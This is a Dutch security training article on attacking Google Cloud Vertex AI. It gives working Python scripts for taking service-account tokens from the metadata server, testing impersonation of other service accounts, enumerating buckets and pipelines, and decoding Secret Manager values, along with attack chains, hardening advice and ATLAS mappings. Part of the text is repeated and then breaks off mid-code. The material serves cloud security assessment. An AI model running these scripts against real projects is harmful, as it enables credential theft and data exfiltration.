GCP Vertex AI-aanvalsoppervlak

Gevorderd14 min lezenBijgewerkt op 2026-03-13

Beveiligingsbeoordeling van Google Cloud Vertex AI -- exploitatie van serviceaccounts, endpointbeveiliging, notebook-aanvallen en pijplijnmanipulatie.

gcp vertex-ai cloud ml-platform

Vertex AI-architectuur

GCP Vertex AI biedt beheerde ML-services die zijn geïntegreerd met de IAM-, netwerk- en opslagsystemen van Google Cloud. Resources zijn georganiseerd per GCP-project en gebruiken serviceaccounts voor authenticatie.

Belangrijkste componenten

Component	Identiteit	Opslag	Netwerk
Workbench	Serviceaccount	GCS	VPC optioneel
Trainingstaken	Aangepast serviceaccount	GCS in-/uitvoer	VPC optioneel
Endpoints	Serviceaccount	Model in GCS/AR	Internetgericht
Pipelines	Pipeline-SA	GCS-artefacten	VPC
Feature Store	Featurestore-SA	BigTable/BigQuery	VPC

Aanvalstechnieken

1. Extractie van serviceaccounttoken

Vertex AI Workbench-instances (voorheen AI Platform Notebooks) draaien met een GCP-serviceaccount. De GCP-metadataserver op metadata.google.internal biedt toegangstokens zonder dat aanvullende authenticatie vereist is -- elke code die op de instance wordt uitgevoerd, kan tokens verkrijgen voor het gekoppelde serviceaccount.

In tegenstelling tot AWS IMDS vereist de metadataserver van GCP alleen een Metadata-Flavor: Google-header, die triviaal kan worden toegevoegd. Het primaire risico is dat Workbench-serviceaccounts vaak de Editor-rol op het project krijgen, waardoor ze schrijftoegang krijgen tot bijna elke GCP-resource.

import requests
 
# From inside a Vertex AI Workbench instance
# GCP metadata server for service account tokens
metadata_url = "http://metadata.google.internal/computeMetadata/v1"
headers = {"Metadata-Flavor": "Google"}
 
# Get the service account
sa = requests.get(
    f"{metadata_url}/instance/service-accounts/default/email",
    headers=headers
).text
print(f"Service Account: {sa}")
 
# Get an access token
token = requests.get(
    f"{metadata_url}/instance/service-accounts/default/token",
    headers=headers
).json()["access_token"]
 
# Enumerate accessible projects
projects = requests.get(
    "https://cloudresourcemanager.googleapis.com/v1/projects",
    headers={"Authorization": f"Bearer {token}"}
).json()
for p in projects.get("projects", []):
    print(f"Project: {p['name']} ({p['projectId']})")

Volledige metadata-enumeratie

import requests
 
metadata_url = "http://metadata.google.internal/computeMetadata/v1"
headers = {"Metadata-Flavor": "Google"}
 
def get_metadata(path):
    """Recursively enumerate metadata entries."""
    resp = requests.get(
        f"{metadata_url}/{path}",
        headers={**headers, "Accept": "application/json"},
        params={"recursive": "true"}
    )
    return resp.json() if resp.status_code == 200 else resp.text
 
# Instance metadata
instance = get_metadata("instance")
print(f"Instance name: {instance.get('name')}")
print(f"Zone: {instance.get('zone')}")
print(f"Machine type: {instance.get('machineType')}")
 
# Network interfaces (discover VPC, subnet, external IP)
for iface in instance.get('networkInterfaces', []):
    print(f"Network: {iface.get('network')}")
    print(f"  Internal IP: {iface.get('ip')}")
    for ac in iface.get('accessConfigs', []):
        print(f"  External IP: {ac.get('externalIp')}")
 
# All service accounts and their scopes
for sa_email in instance.get('serviceAccounts', {}):
    sa_info = instance['serviceAccounts'][sa_email]
    print(f"\nService Account: {sa_email}")
    print(f"  Scopes: {sa_info.get('scopes', [])}")
 
# Project-level metadata (may contain secrets set by admins)
project = get_metadata("project")
for key, value in project.get('attributes', {}).items():
    print(f"Project attribute: {key} = {str(value)[:100]}")
    if any(kw in key.lower() for kw in
           ['key', 'secret', 'password', 'token', 'credential']):
        print(f"  [!] Potentially sensitive project attribute")
 
# Check for custom instance attributes
for key, value in instance.get('attributes', {}).items():
    print(f"Instance attribute: {key} = {str(value)[:100]}")

Privilege-escalatie van serviceaccounts

GCP-serviceaccounts kunnen zich voordoen als andere serviceaccounts als ze de rol iam.serviceAccountTokenCreator hebben. Dit creëert ketens van privilege-escalatie die niet zichtbaar zijn vanaf de Workbench-instance zelf.

import requests
import json
 
def check_sa_impersonation(token, project_id, source_sa):
    """Check if the current service account can impersonate others."""
    headers = {"Authorization": f"Bearer {token}"}
 
    # List all service accounts in the project
    sa_url = (
        f"https://iam.googleapis.com/v1/projects/{project_id}"
        f"/serviceAccounts"
    )
    sas = requests.get(sa_url, headers=headers).json()
 
    for sa in sas.get('accounts', []):
        sa_email = sa['email']
        if sa_email == source_sa:
            continue
 
        # Attempt to generate an access token for this SA
        impersonate_url = (
            f"https://iamcredentials.googleapis.com/v1/projects/-"
            f"/serviceAccounts/{sa_email}:generateAccessToken"
        )
        resp = requests.post(
            impersonate_url,
            headers={
                "Authorization": f"Bearer {token}",
                "Content-Type": "application/json"
            },
            json={"scope": ["https://www.googleapis.com/auth/cloud-platform"]}
        )
 
        if resp.status_code == 200:
            print(f"[!] Can impersonate: {sa_email}")
            impersonated_token = resp.json()['accessToken']
            # Test what this SA can access
            test_permissions(impersonated_token, project_id)
        else:
            print(f"Cannot impersonate: {sa_email}")
 
def test_permissions(token, project_id):
    """Quick permission check for an access token."""
    headers = {"Authorization": f"Bearer {token}"}
    tests = {
        "BigQuery": f"https://bigquery.googleapis.com/bigquery/v2/projects/{project_id}/datasets",
        "GCS": "https://storage.googleapis.com/storage/v1/b?project=" + project_id,
        "Compute": f"https://compute.googleapis.com/compute/v1/projects/{project_id}/zones",
        "SecretManager": f"https://secretmanager.googleapis.com/v1/projects/{project_id}/secrets",
    }
    for service, url in tests.items():
        resp = requests.get(url, headers=headers)
        status = "accessible" if resp.status_code == 200 else "denied"
        print(f"  {service}: {status}")

2. Enumeratie van Vertex AI-endpoints

Vertex AI-endpoints leveren modelvoorspellingen. Standaard vereisen endpoints IAM-authenticatie, maar verkeerde configuraties zoals allUsers- of allAuthenticatedUsers-bindingen op de endpointresource kunnen modellen publiekelijk blootstellen.

from google.cloud import aiplatform
 
aiplatform.init(project="my-project", location="us-central1")
 
# List all endpoints
endpoints = aiplatform.Endpoint.list()
for endpoint in endpoints:
    print(f"Endpoint: {endpoint.display_name}")
    print(f"  Resource: {endpoint.resource_name}")
    print(f"  Models: {[m.display_name for m in endpoint.list_models()]}")
 
    # Test prediction
    try:
        result = endpoint.predict(instances=[{"text": "test"}])
        print(f"  Prediction: {result.predictions[:1]}")
    except Exception as e:
        print(f"  Error: {e}")

Analyse van het IAM-beleid van endpoints

import requests
 
def analyze_endpoint_iam(token, project_id, location, endpoint_id):
    """Check IAM policy on a Vertex AI endpoint for overly permissive access."""
    headers = {
        "Authorization": f"Bearer {token}",
        "Content-Type": "application/json"
    }
 
    resource = (
        f"projects/{project_id}/locations/{location}"
        f"/endpoints/{endpoint_id}"
    )
    url = (
        f"https://{location}-aiplatform.googleapis.com/v1/{resource}"
        f":getIamPolicy"
    )
    resp = requests.post(url, headers=headers, json={})
    policy = resp.json()
 
    findings = []
    for binding in policy.get('bindings', []):
        role = binding['role']
        members = binding['members']
 
        # Check for overly permissive access
        for member in members:
            if member in ('allUsers', 'allAuthenticatedUsers'):
                findings.append({
                    "severity": "CRITICAL",
                    "finding": f"Endpoint publicly accessible: "
                               f"{member} has {role}"
                })
            elif member.startswith('domain:'):
                findings.append({
                    "severity": "MEDIUM",
                    "finding": f"Domain-wide access: {member} has {role}"
                })
 
    return findings
 
# Also check for endpoints exposed via API Gateway or Cloud Endpoints
def check_api_gateway_exposure(token, project_id):
    """Check if Vertex AI endpoints are exposed via API Gateway."""
    headers = {"Authorization": f"Bearer {token}"}
    url = (
        f"https://apigateway.googleapis.com/v1/projects/{project_id}"
        f"/locations/-/apis"
    )
    resp = requests.get(url, headers=headers)
    for api in resp.json().get('apis', []):
        print(f"API Gateway: {api['displayName']} - {api['name']}")

3. Toegang tot GCS-trainingsdata

Vertex AI slaat trainingsdata, modelartefacten, pijplijnuitvoer en TensorBoard-logs op in Google Cloud Storage. Het benoemen van GCS-buckets is minder voorspelbaar dan de conventie van SageMaker, maar bucketlabels en IAM-beleid onthullen ML-gerelateerde buckets.

from google.cloud import storage
 
client = storage.Client()
 
# List buckets looking for ML data
for bucket in client.list_buckets():
    if any(kw in bucket.name.lower() for kw in ['ml', 'training', 'data', 'model', 'vertex']):
        print(f"\nBucket: {bucket.name}")
        blobs = list(bucket.list_blobs(max_results=10))
        for blob in blobs:
            print(f"  {blob.name} ({blob.size} bytes)")

Diepe GCS-enumeratie en ontdekking van gevoelige data

from google.cloud import storage
import json
 
client = storage.Client()
 
def enumerate_ml_buckets(client):
    """Comprehensive ML bucket discovery and content analysis."""
    ml_keywords = ['ml', 'training', 'data', 'model', 'vertex', 'pipeline',
                   'experiment', 'tensorboard', 'artifact', 'feature']
    sensitive_extensions = ['.csv', '.parquet', '.jsonl', '.pkl', '.pickle',
                           '.pt', '.pth', '.h5', '.pb', '.onnx']
 
    for bucket in client.list_buckets():
        # Check bucket name and labels
        is_ml = any(kw in bucket.name.lower() for kw in ml_keywords)
        labels = bucket.labels or {}
        is_ml = is_ml or any(kw in str(labels).lower() for kw in ml_keywords)
 
        if not is_ml:
            continue
 
        print(f"\n{'='*60}")
        print(f"Bucket: {bucket.name}")
        print(f"  Location: {bucket.location}")
        print(f"  Storage class: {bucket.storage_class}")
        print(f"  Labels: {labels}")
        print(f"  Versioning: {bucket.versioning_enabled}")
        print(f"  Public: {bucket.iam_configuration.public_access_prevention}")
 
        # Check bucket IAM policy
        try:
            policy = bucket.get_iam_policy()
            for role, members in policy.items():
                for member in members:
                    if member in ('allUsers', 'allAuthenticatedUsers'):
                        print(f"  [CRITICAL] Public access: {member} -> {role}")
        except Exception as e:
            print(f"  Cannot read IAM: {e}")
 
        # Enumerate contents looking for sensitive data
        sensitive_files = []
        total_size = 0
        for blob in bucket.list_blobs(max_results=100):
            total_size += blob.size
            if any(blob.name.endswith(ext) for ext in sensitive_extensions):
                sensitive_files.append({
                    "name": blob.name,
                    "size": blob.size,
                    "updated": str(blob.updated)
                })
 
        print(f"  Total size (sampled): {total_size / 1e6:.1f} MB")
        if sensitive_files:
            print(f"  Sensitive files found: {len(sensitive_files)}")
            for f in sensitive_files[:10]:
                print(f"    {f['name']} ({f['size']} bytes)")
 
# Also check BigQuery datasets (common for feature stores)
def check_bigquery_datasets(token, project_id):
    """Enumerate BigQuery datasets that may contain ML features or training data."""
    import requests
    headers = {"Authorization": f"Bearer {token}"}
    url = f"https://bigquery.googleapis.com/bigquery/v2/projects/{project_id}/datasets"
    resp = requests.get(url, headers=headers)
    for ds in resp.json().get('datasets', []):
        ds_ref = ds['datasetReference']
        print(f"BigQuery dataset: {ds_ref['datasetId']}")
        # Check for ML-related tables
        tables_url = (
            f"https://bigquery.googleapis.com/bigquery/v2/projects/"
            f"{project_id}/datasets/{ds_ref['datasetId']}/tables"
        )
        tables = requests.get(tables_url, headers=headers).json()
        for table in tables.get('tables', []):
            print(f"  Table: {table['tableReference']['tableId']}")

4. Extractie van pijplijnartefacten

Vertex AI Pipelines (gebaseerd op Kubeflow Pipelines) orkestreren ML-workflows. Pijplijnruns bevatten artefacten, waaronder getrainde modellen, evaluatiemetrieken, datasetreferenties en hyperparameters. Het compromitteren van pijplijntoegang onthult de volledige ML-workflow en de data-afhankelijkheden ervan.

from google.cloud import aiplatform
 
# List pipeline runs and their artifacts
for run in aiplatform.PipelineJob.list():
    print(f"Pipeline: {run.display_name}")
    print(f"  State: {run.state}")
    print(f"  Created: {run.create_time}")
    # Pipeline artifacts contain model files, metrics, and parameters
    for detail in run.task_details:
        print(f"  Task: {detail.task_name}")
        for artifact in detail.outputs.values():
            print(f"    Output: {artifact}")

Extractie van pijplijntemplate en -configuratie

from google.cloud import aiplatform
import json
 
def extract_pipeline_details(project_id, location):
    """Extract pipeline templates and configurations that reveal
    the full ML workflow."""
    aiplatform.init(project=project_id, location=location)
 
    for run in aiplatform.PipelineJob.list():
        print(f"\n{'='*60}")
        print(f"Pipeline: {run.display_name}")
        print(f"  State: {run.state}")
        print(f"  Service Account: {run.service_account}")
        print(f"  Network: {run.network}")
 
        # Extract pipeline spec (the workflow definition)
        if hasattr(run, 'pipeline_spec'):
            spec = run.pipeline_spec
            # Pipeline specs reveal component images, input/output locations,
            # and the full data flow
            if 'components' in spec:
                for comp_name, comp in spec['components'].items():
                    print(f"  Component: {comp_name}")
                    if 'executorLabel' in comp:
                        print(f"    Executor: {comp['executorLabel']}")
 
        # Extract runtime parameters (may contain sensitive values)
        if hasattr(run, 'runtime_config'):
            config = run.runtime_config
            if 'parameters' in config:
                for param_name, param_value in config['parameters'].items():
                    value_str = str(param_value)[:100]
                    print(f"  Param: {param_name} = {value_str}")
                    if any(kw in param_name.lower() for kw in
                           ['key', 'secret', 'token', 'password']):
                        print(f"    [!] Potentially sensitive parameter")
 
    # Also check Vertex AI Metadata Store for experiment tracking
    print("\n=== Metadata Store (Experiments) ===")
    for experiment in aiplatform.Experiment.list():
        print(f"Experiment: {experiment.name}")

5. Exploitatie van Secret Manager

GCP Secret Manager is de aanbevolen manier om credentials op te slaan, maar Vertex AI-serviceaccounts kunnen te brede toegang hebben tot secrets buiten wat ML-workflows vereisen.

import requests
 
def enumerate_secrets(token, project_id):
    """Enumerate and attempt to access Secret Manager secrets."""
    headers = {"Authorization": f"Bearer {token}"}
 
    # List all secrets
    url = (
        f"https://secretmanager.googleapis.com/v1/projects/{project_id}"
        f"/secrets"
    )
    resp = requests.get(url, headers=headers)
    secrets = resp.json().get('secrets', [])
 
    for secret in secrets:
        secret_name = secret['name'].split('/')[-1]
        print(f"\nSecret: {secret_name}")
        print(f"  Created: {secret.get('createTime')}")
        labels = secret.get('labels', {})
        print(f"  Labels: {labels}")
 
        # Attempt to access the latest version
        version_url = (
            f"https://secretmanager.googleapis.com/v1/"
            f"{secret['name']}/versions/latest:access"
        )
        version_resp = requests.get(version_url, headers=headers)
        if version_resp.status_code == 200:
            import base64
            payload = version_resp.json()['payload']['data']
            decoded = base64.b64decode(payload).decode('utf-8', errors='replace')
            print(f"  [!] Accessible - Value: {decoded[:50]}...")
        else:
            print(f"  Access denied ({version_resp.status_code})")

Checklist voor defensieve beoordeling

Controlegebied	Wat te verifiëren	MITRE ATLAS-referentie
Serviceaccounts	Rollen met minimale privileges, geen `Editor` of `Owner` op Workbench-SA's	AML.T0003 (ML Model Access)
Metadataserver	Aangepaste metadata-attributen bevatten geen secrets	AML.TA0008 (Collection)
Netwerk	VPC Service Controls, Private Google Access, geen publieke IP's op Workbench	AML.T0002 (Active Scanning)
GCS	Uniforme toegang op bucketniveau, geen `allUsers`-bindingen, encryptie	AML.T0000 (Search for Data)
Endpoints	Alleen IAM-authenticatie, geen bindingen voor publieke toegang	AML.T0003 (ML Model Access)
Secrets	Begrensde Secret Manager-toegang, audit logging	AML.TA0008 (Collection)
Pipelines	Pipeline-SA gescheiden van Workbench-SA, geen secrets in parameters	AML.T0018 (Backdoor ML Model)
Logging	Cloud Audit Logs ingeschakeld, Data Access-logs voor GCS en BigQuery	AML.TA0006 (Defense Evasion)

Aanbevolen verharding

Gebruik toegewijde serviceaccounts per Workbench-instance met alleen de IAM-rollen die nodig zijn voor het werk van die gebruiker, nooit Editor of Owner.
Schakel VPC Service Controls in om een beveiligingsperimeter rond ML-resources te creëren, waardoor data-exfiltratie zelfs met geldige credentials wordt voorkomen.
Gebruik waar mogelijk Workload Identity Federation in plaats van serviceaccountsleutels.
Schakel Cloud Audit Logs in met Data Access-logging voor GCS-, BigQuery- en Vertex AI-API-aanroepen.
Verwijder publieke IP's van Workbench-instances en gebruik IAP-tunnels (Identity-Aware Proxy) voor toegang.
Dwing organisatiebeleid af zoals constraints/iam.disableServiceAccountKeyCreation en constraints/compute.requireShieldedVm.
Gebruik Customer-Managed Encryption Keys (CMEK) voor GCS-buckets, BigQuery-datasets en Vertex AI-resources.
Implementeer VPC-SC ingress/egress-regels om te beperken welke identiteiten en services toegang hebben tot de ML-perimeter.

Veelvoorkomende aanvalsketens

Keten 1: Van Workbench tot projectovername

1. Initial access via compromised user credentials or malicious notebook
2. Extract service account token from GCP metadata server
3. Discover the SA has Editor role on the project (common misconfiguration)
4. Enumerate all project resources: GCS, BigQuery, Compute Engine, GKE
5. Access Secret Manager to extract API keys and database credentials
6. Test service account impersonation for SAs in other projects
7. If impersonation succeeds, pivot to other projects in the organization

Keten 2: Op pijplijnen gebaseerde data-exfiltratie

1. Access Vertex AI Pipelines via compromised service account
2. Extract pipeline templates to understand data flow
3. Identify GCS buckets and BigQuery tables used for training data
4. Access training datasets containing PII or proprietary data
5. Exfiltrate data to attacker-controlled GCS bucket (if VPC-SC absent)
6. Use extracted data for model replication or competitive intelligence

Keten 3: Manipulatie van modelartefacten

1. Enumerate GCS buckets containing model artifacts
2. Download the production model artifact
3. Inject a backdoor (e.g., trojan trigger in the model weights)
4. Upload modified artifact to the same GCS path
5. If model versioning is not enforced, the next deployment loads the
   backdoored model
6. Backdoor activates on specific trigger inputs in production

GCP-specifieke risico's

GCP presenteert verschillende unieke risico's vergeleken met AWS en Azure in de context van ML-beveiliging:

GCP-specifiek risico	Beschrijving	Mitigatie
Standaard Compute Engine-SA	Vertex AI gebruikt mogelijk het standaard CE-serviceaccount, dat `Editor` op het project heeft	Maak toegewijde SA's met minimale rollen
Lacunes in organisatiebeleid	Organisatiebeleid dekt mogelijk geen Vertex AI-specifieke resources	Breid organisatiebeleid uit om `aiplatform.*`-constraints te dekken
VPC-SC-complexiteit	VPC Service Controls zijn krachtig maar complex; verkeerd geconfigureerde perimeters creëren een vals gevoel van veiligheid	Regelmatige audits van VPC-SC-configuratie
BigQuery-integratie	Vertex AI Feature Store gebruikt BigQuery, dat niet-ML gevoelige data kan bevatten	Aparte BigQuery-datasets voor ML-features
Gedeelde repo's in Artifact Registry	ML-containerimages kunnen repo's delen met niet-ML-containers	Toegewijde repo's voor ML-images met strikte IAM

MITRE ATLAS-koppeling voor Vertex AI-aanvallen

Aanvalstechniek	ATLAS-ID	Vertex AI-specifieke context
Tokenextractie via metadataserver	AML.TA0002 (Initial Access)	Workbench-serviceaccount met brede projecttoegang
GCS-data-enumeratie	AML.T0000 (Search for Victim's Data)	ML-buckets zijn vindbaar via labels en naamgeving
Endpoint-sondering	AML.T0002 (Active Scanning)	Vertex AI-endpoints kunnen publieke IAM-bindingen hebben
Modelextractie via voorspellings-API	AML.T0024 (Model Extraction)	Aanvallen met hoog queryvolume via Vertex AI Prediction
Manipulatie van pijplijnartefacten	AML.T0018 (Backdoor ML Model)	GCS-modelartefacten zijn wijzigbaar als bucket-IAM zwak is
Feature Store-vergiftiging	AML.T0020 (Data Poisoning)	Wijziging van BigQuery/Bigtable-featuredata

Verwante onderwerpen

Cloud-AI-infrastructuur -- Platformoverkoepelend overzicht
AWS SageMaker -- AWS-vergelijking
Azure ML -- Azure-vergelijking

Referenties

Google Cloud Vertex AI Security Overview - Google Cloud (2024) - Officiële documentatie over de beveiligingsarchitectuur
"GCP Service Account Best Practices" - Google Cloud (2024) - Het beperken van de scope van serviceaccounts en sleutelbeheer
"Securing AI Workloads on Google Cloud" - Google Cloud Architecture Center (2024) - Architectuurpatronen voor ML-beveiliging
"BeyondProd: A New Approach to Cloud-Native Security" - Google (2019) - Fundamenten van het GCP-beveiligingsmodel

Knowledge Check

Wat is het primaire pad voor laterale beweging vanaf een gecompromitteerde Vertex AI Workbench-instance?

GCP Vertex AI-aanvalsoppervlak

Gevorderd14 min lezenBijgewerkt op 2026-03-13

Beveiligingsbeoordeling van Google Cloud Vertex AI -- exploitatie van serviceaccounts, endpointbeveiliging, notebook-aanvallen en pijplijnmanipulatie.

gcp vertex-ai cloud ml-platform

Vertex AI-architectuur

Belangrijkste componenten

Component	Identiteit	Opslag	Netwerk
Workbench	Serviceaccount	GCS	VPC optioneel
Trainingstaken	Aangepast serviceaccount	GCS in-/uitvoer	VPC optioneel
Endpoints	Serviceaccount	Model in GCS/AR	Internetgericht
Pipelines	Pipeline-SA	GCS-artefacten	VPC
Feature Store	Featurestore-SA	BigTable/BigQuery	VPC

Aanvalstechnieken

1. Extractie van serviceaccounttoken

import requests
 
# From inside a Vertex AI Workbench instance
# GCP metadata server for service account tokens
metadata_url = "http://metadata.google.internal/computeMetadata/v1"
headers = {"Metadata-Flavor": "Google"}
 
# Get the service account
sa = requests.get(
    f"{metadata_url}/instance/service-accounts/default/email",
    headers=headers
).text
print(f"Service Account: {sa}")
 
# Get an access token
token = requests.get(
    f"{metadata_url}/instance/service-accounts/default/token",
    headers=headers
).json()["access_token"]
 
# Enumerate accessible projects
projects = requests.get(
    "https://cloudresourcemanager.googleapis.com/v1/projects",
    headers={"Authorization": f"Bearer {token}"}
).json()
for p in projects.get("projects", []):
    print(f"Project: {p['name']} ({p['projectId']})")

Volledige metadata-enumeratie

import requests
 
metadata_url = "http://metadata.google.internal/computeMetadata/v1"
headers = {"Metadata-Flavor": "Google"}
 
def get_metadata(path):
    """Recursively enumerate metadata entries."""
    resp = requests.get(
        f"{metadata_url}/{path}",
        headers={**headers, "Accept": "application/json"},
        params={"recursive": "true"}
    )
    return resp.json() if resp.status_code == 200 else resp.text
 
# Instance metadata
instance = get_metadata("instance")
print(f"Instance name: {instance.get('name')}")
print(f"Zone: {instance.get('zone')}")
print(f"Machine type: {instance.get('machineType')}")
 
# Network interfaces (discover VPC, subnet, external IP)
for iface in instance.get('networkInterfaces', []):
    print(f"Network: {iface.get('network')}")
    print(f"  Internal IP: {iface.get('ip')}")
    for ac in iface.get('accessConfigs', []):
        print(f"  External IP: {ac.get('externalIp')}")
 
# All service accounts and their scopes
for sa_email in instance.get('serviceAccounts', {}):
    sa_info = instance['serviceAccounts'][sa_email]
    print(f"\nService Account: {sa_email}")
    print(f"  Scopes: {sa_info.get('scopes', [])}")
 
# Project-level metadata (may contain secrets set by admins)
project = get_metadata("project")
for key, value in project.get('attributes', {}).items():
    print(f"Project attribute: {key} = {str(value)[:100]}")
    if any(kw in key.lower() for kw in
           ['key', 'secret', 'password', 'token', 'credential']):
        print(f"  [!] Potentially sensitive project attribute")
 
# Check for custom instance attributes
for key, value in instance.get('attributes', {}).items():
    print(f"Instance attribute: {key} = {str(value)[:100]}")

Privilege-escalatie van serviceaccounts

import requests
import json
 
def check_sa_impersonation(token, project_id, source_sa):
    """Check if the current service account can impersonate others."""
    headers = {"Authorization": f"Bearer {token}"}
 
    # List all service accounts in the project
    sa_url = (
        f"https://iam.googleapis.com/v1/projects/{project_id}"
        f"/serviceAccounts"
    )
    sas = requests.get(sa_url, headers=headers).json()
 
    for sa in sas.get('accounts', []):
        sa_email = sa['email']
        if sa_email == source_sa:
            continue
 
        # Attempt to generate an access token for this SA
        impersonate_url = (
            f"https://iamcredentials.googleapis.com/v1/projects/-"
            f"/serviceAccounts/{sa_email}:generateAccessToken"
        )
        resp = requests.post(
            impersonate_url,
            headers={
                "Authorization": f"Bearer {token}",
                "Content-Type": "application/json"
            },
            json={"scope": ["https://www.googleapis.com/auth/cloud-platform"]}
        )
 
        if resp.status_code == 200:
            print(f"[!] Can impersonate: {sa_email}")
            impersonated_token = resp.json()['accessToken']
            # Test what this SA can access
            test_permissions(impersonated_token, project_id)
        else:
            print(f"Cannot impersonate: {sa_email}")
 
def test_permissions(token, project_id):
    """Quick permission check for an access token."""
    headers = {"Authorization": f"Bearer {token}"}
    tests = {
        "BigQuery": f"https://bigquery.googleapis.com/bigquery/v2/projects/{project_id}/datasets",
        "GCS": "https://storage.googleapis.com/storage/v1/b?project=" + project_id,
        "Compute": f"https://compute.googleapis.com/compute/v1/projects/{project_id}/zones",
        "SecretManager": f"https://secretmanager.googleapis.com/v1/projects/{project_id}/secrets",
    }
    for service, url in tests.items():
        resp = requests.get(url, headers=headers)
        status = "accessible" if resp.status_code == 200 else "denied"
        print(f"  {service}: {status}")

2. Enumeratie van Vertex AI-endpoints

from google.cloud import aiplatform
 
aiplatform.init(project="my-project", location="us-central1")
 
# List all endpoints
endpoints = aiplatform.Endpoint.list()
for endpoint in endpoints:
    print(f"Endpoint: {endpoint.display_name}")
    print(f"  Resource: {endpoint.resource_name}")
    print(f"  Models: {[m.display_name for m in endpoint.list_models()]}")
 
    # Test prediction
    try:
        result = endpoint.predict(instances=[{"text": "test"}])
        print(f"  Prediction: {result.predictions[:1]}")
    except Exception as e:
        print(f"  Error: {e}")

Analyse van het IAM-beleid van endpoints

import requests
 
def analyze_endpoint_iam(token, project_id, location, endpoint_id):
    """Check IAM policy on a Vertex AI endpoint for overly permissive access."""
    headers = {
        "Authorization": f"Bearer {token}",
        "Content-Type": "application/json"
    }
 
    resource = (
        f"projects/{project_id}/locations/{location}"
        f"/endpoints/{endpoint_id}"
    )
    url = (
        f"https://{location}-aiplatform.googleapis.com/v1/{resource}"
        f":getIamPolicy"
    )
    resp = requests.post(url, headers=headers, json={})
    policy = resp.json()
 
    findings = []
    for binding in policy.get('bindings', []):
        role = binding['role']
        members = binding['members']
 
        # Check for overly permissive access
        for member in members:
            if member in ('allUsers', 'allAuthenticatedUsers'):
                findings.append({
                    "severity": "CRITICAL",
                    "finding": f"Endpoint publicly accessible: "
                               f"{member} has {role}"
                })
            elif member.startswith('domain:'):
                findings.append({
                    "severity": "MEDIUM",
                    "finding": f"Domain-wide access: {member} has {role}"
                })
 
    return findings
 
# Also check for endpoints exposed via API Gateway or Cloud Endpoints
def check_api_gateway_exposure(token, project_id):
    """Check if Vertex AI endpoints are exposed via API Gateway."""
    headers = {"Authorization": f"Bearer {token}"}
    url = (
        f"https://apigateway.googleapis.com/v1/projects/{project_id}"
        f"/locations/-/apis"
    )
    resp = requests.get(url, headers=headers)
    for api in resp.json().get('apis', []):
        print(f"API Gateway: {api['displayName']} - {api['name']}")

3. Toegang tot GCS-trainingsdata

from google.cloud import storage
 
client = storage.Client()
 
# List buckets looking for ML data
for bucket in client.list_buckets():
    if any(kw in bucket.name.lower() for kw in ['ml', 'training', 'data', 'model', 'vertex']):
        print(f"\nBucket: {bucket.name}")
        blobs = list(bucket.list_blobs(max_results=10))
        for blob in blobs:
            print(f"  {blob.name} ({blob.size} bytes)")

Diepe GCS-enumeratie en ontdekking van gevoelige data

from google.cloud import storage
import json
 
client = storage.Client()
 
def enumerate_ml_buckets(client):
    """Comprehensive ML bucket discovery and content analysis."""
    ml_keywords = ['ml', 'training', 'data', 'model', 'vertex', 'pipeline',
                   'experiment', 'tensorboard', 'artifact', 'feature']
    sensitive_extensions = ['.csv', '.parquet', '.jsonl', '.pkl', '.pickle',
                           '.pt', '.pth', '.h5', '.pb', '.onnx']
 
    for bucket in client.list_buckets():
        # Check bucket name and labels
        is_ml = any(kw in bucket.name.lower() for kw in ml_keywords)
        labels = bucket.labels or {}
        is_ml = is_ml or any(kw in str(labels).lower() for kw in ml_keywords)
 
        if not is_ml:
            continue
 
        print(f"\n{'='*60}")
        print(f"Bucket: {bucket.name}")
        print(f"  Location: {bucket.location}")
        print(f"  Storage class: {bucket.storage_class}")
        print(f"  Labels: {labels}")
        print(f"  Versioning: {bucket.versioning_enabled}")
        print(f"  Public: {bucket.iam_configuration.public_access_prevention}")
 
        # Check bucket IAM policy
        try:
            policy = bucket.get_iam_policy()
            for role, members in policy.items():
                for member in members:
                    if member in ('allUsers', 'allAuthenticatedUsers'):
                        print(f"  [CRITICAL] Public access: {member} -> {role}")
        except Exception as e:
            print(f"  Cannot read IAM: {e}")
 
        # Enumerate contents looking for sensitive data
        sensitive_files = []
        total_size = 0
        for blob in bucket.list_blobs(max_results=100):
            total_size += blob.size
            if any(blob.name.endswith(ext) for ext in sensitive_extensions):
                sensitive_files.append({
                    "name": blob.name,
                    "size": blob.size,
                    "updated": str(blob.updated)
                })
 
        print(f"  Total size (sampled): {total_size / 1e6:.1f} MB")
        if sensitive_files:
            print(f"  Sensitive files found: {len(sensitive_files)}")
            for f in sensitive_files[:10]:
                print(f"    {f['name']} ({f['size']} bytes)")
 
# Also check BigQuery datasets (common for feature stores)
def check_bigquery_datasets(token, project_id):
    """Enumerate BigQuery datasets that may contain ML features or training data."""
    import requests
    headers = {"Authorization": f"Bearer {token}"}
    url = f"https://bigquery.googleapis.com/bigquery/v2/projects/{project_id}/datasets"
    resp = requests.get(url, headers=headers)
    for ds in resp.json().get('datasets', []):
        ds_ref = ds['datasetReference']
        print(f"BigQuery dataset: {ds_ref['datasetId']}")
        # Check for ML-related tables
        tables_url = (
            f"https://bigquery.googleapis.com/bigquery/v2/projects/"
            f"{project_id}/datasets/{ds_ref['datasetId']}/tables"
        )
        tables = requests.get(tables_url, headers=headers).json()
        for table in tables.get('tables', []):
            print(f"  Table: {table['tableReference']['tableId']}")

4. Extractie van pijplijnartefacten

from google.cloud import aiplatform
 
# List pipeline runs and their artifacts
for run in aiplatform.PipelineJob.list():
    print(f"Pipeline: {run.display_name}")
    print(f"  State: {run.state}")
    print(f"  Created: {run.create_time}")
    # Pipeline artifacts contain model files, metrics, and parameters
    for detail in run.task_details:
        print(f"  Task: {detail.task_name}")
        for artifact in detail.outputs.values():
            print(f"    Output: {artifact}")

Extractie van pijplijntemplate en -configuratie

from google.cloud import aiplatform
import json
 
def extract_pipeline_details(project_id, location):
    """Extract pipeline templates and configurations that reveal
    the full ML workflow."""
    aiplatform.init(project=project_id, location=location)
 
    for run in aiplatform.PipelineJob.list():
        print(f"\n{'='*60}")
        print(f"Pipeline: {run.display_name}")
        print(f"  State: {run.state}")
        print(f"  Service Account: {run.service_account}")
        print(f"  Network: {run.network}")
 
        # Extract pipeline spec (the workflow definition)
        if hasattr(run, 'pipeline_spec'):
            spec = run.pipeline_spec
            # Pipeline specs reveal component images, input/output locations,
            # and the full data flow
            if 'components' in spec:
                for comp_name, comp in spec['components'].items():
                    print(f"  Component: {comp_name}")
                    if 'executorLabel' in comp:
                        print(f"    Executor: {comp['executorLabel']}")
 
        # Extract runtime parameters (may contain sensitive values)
        if hasattr(run, 'runtime_config'):
            config = run.runtime_config
            if 'parameters' in config:
                for param_name, param_value in config['parameters'].items():
